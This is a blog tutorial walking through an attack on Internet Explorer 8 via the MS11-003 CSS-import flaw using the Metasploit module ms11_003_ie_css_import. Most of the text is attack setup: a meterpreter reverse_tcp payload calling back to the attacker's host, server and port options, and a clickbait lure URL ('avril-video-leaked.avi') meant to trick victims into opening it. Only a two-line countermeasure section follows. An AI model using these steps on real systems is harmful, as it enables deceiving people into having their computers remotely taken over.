Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5

Victim O.S : Windows 7 SP 1

Victim Browser : Internet Explorer 8

Microsoft Internet Explorer have another vulnerability after so many vulnerability have found by security researcher. The MS11_003 vulnerability actually found at February 08, 2011 according to Microsoft security bulletin.

In this tutorial we will try to exploit that vulnerability MS11_003 using metasploit module ms11_003_ie_css_import. According to metasploit website :

This module exploits a memory corruption vulnerability within Microsoft\'s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Lets prepare the attack! :

Requirement :

1. Metasploit Framework (website)

2. Operating System (I'm use Backtrack 5 in this tutorial)

3. ms11_003_ie_css_import exploit — download from mediafire.com (press CTRL + click my affiliations box to view download link below)

Step By Step :

1. For the first step, you need to update your metasploit framework to the latest version by running msfupdate command. If you didn't have internet connection to upload, you can download the exploit above and copy to /pentest/exploits/framework3/modules/exploits/windows/browser.

2. The next step we need to use the exploit module ms11_003_ie_css_import by using use exploit/windows/browser/ms11_003_ie_css_import command. In this tutorial I'm using the meterpreter reverse_tcp payload, but you can change another payload to suit your mood.

3. After finished set up exploit and payload, we need to set up and configure the options. In this picture below I'm configuring the options that needed to perform an attack according to my thoughts.

Legends :

set srvhost 192.168.8.93 --> set up our server address change the ip to your IP.

set srvport 80 --> set server port to handle request from victim. port 80 is the best social engineering.

set uripath avril-video-leaked.avi --> make the victim curious about the link you've given so they want to open it.

set lhost 192.168.8.93 --> set up the IP address that will use to connect back when victim successfully exploited.

set lport 443 --> port that will be used by our payload when exploit successfully perform.

exploit --> perform the exploit to generate link that will be used in our attack

http://192.168.8.93/avril-video-leaked.avi --> This is the URL that will be given to victim.

4. When victim open the malicious link we've given, here's the screenshot in attacker console.

The print screen above tell us that attack has performed successfully and now act as notepad.exe process on victim computer.

5. To make sure are we got active sessions from victim or not, do sessions -l command to view active sessions.

6. Looks like great! we've get an active sessions, let's interract with that session by using sessions -i 1 and doing something.

PWNED!

Countermeasure :

1. Always update your browser to the latest version

2. Don't open link that you didn't know

hope it's useful

nb : press CTRL + click the grey area box of my affiliations to view the download link

Vishnu Valentino Computer Security, Blogger Nothing Secure... BANDUNG - INDONESIA CHANGCHUN - CHINA

Follow @vishnuvalentino